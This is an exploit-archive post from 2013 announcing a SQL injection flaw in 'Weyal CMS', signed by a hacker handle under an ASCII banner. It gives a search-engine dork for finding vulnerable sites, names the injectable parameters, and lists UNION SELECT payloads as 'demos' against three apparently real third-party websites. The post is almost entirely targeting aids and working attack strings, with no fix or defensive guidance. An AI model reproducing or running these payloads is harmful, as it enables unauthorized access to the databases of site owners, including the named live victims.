Home / exploits Weyal CMS SQL Injection
Posted on 23 May 2013
================================================ Weyal Cms SQL Injection Vulnerability ================================================ ############################################################################# ______ __ __ __ __ __ __ # / _ / \__/ \__/ \ / /'__` __ # L ,_ ,_ \ ___ /' /\_L _ __ /\_ _ __ # __ / / \ \_ /'___ , < /_/_\_<_/`'__ / /`'__ # / \_ \_ \__ ,__/ \__/ \` / L / __ / # \_ \_ \__\ \__\/_/\_\_/ \____\ \_ \_ \____/ \_/\_\ \_ \_ # /_//_//__/ /__/ /_/ /____/ /_//_//___/ /_//_/ /_//_/ # # [+] Site: http://tools.Att4ck3r.ir # [+] Contact: xrogue_p3rsi4n_hack3r@hotmail.com # ############################################################################# ================================================ [-] Name: Weyal Cms SQL Injection Vulnerability [-] Vendor: N/A [-] Date: 2013-05-22 [-] Author: XroGuE [-] Home: http://Att4ck3r.ir ================================================ [+] Dork: intext:"Designed by Rohi.af" intext:"Designed by Dr. Weyal" ================================================ [+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , "check Another pages :)" [+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi www.[site].com/[path]/countrys.php?id=SQLi [+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6 [+] Demo: http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14 [+] Demo: http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database() ================================================
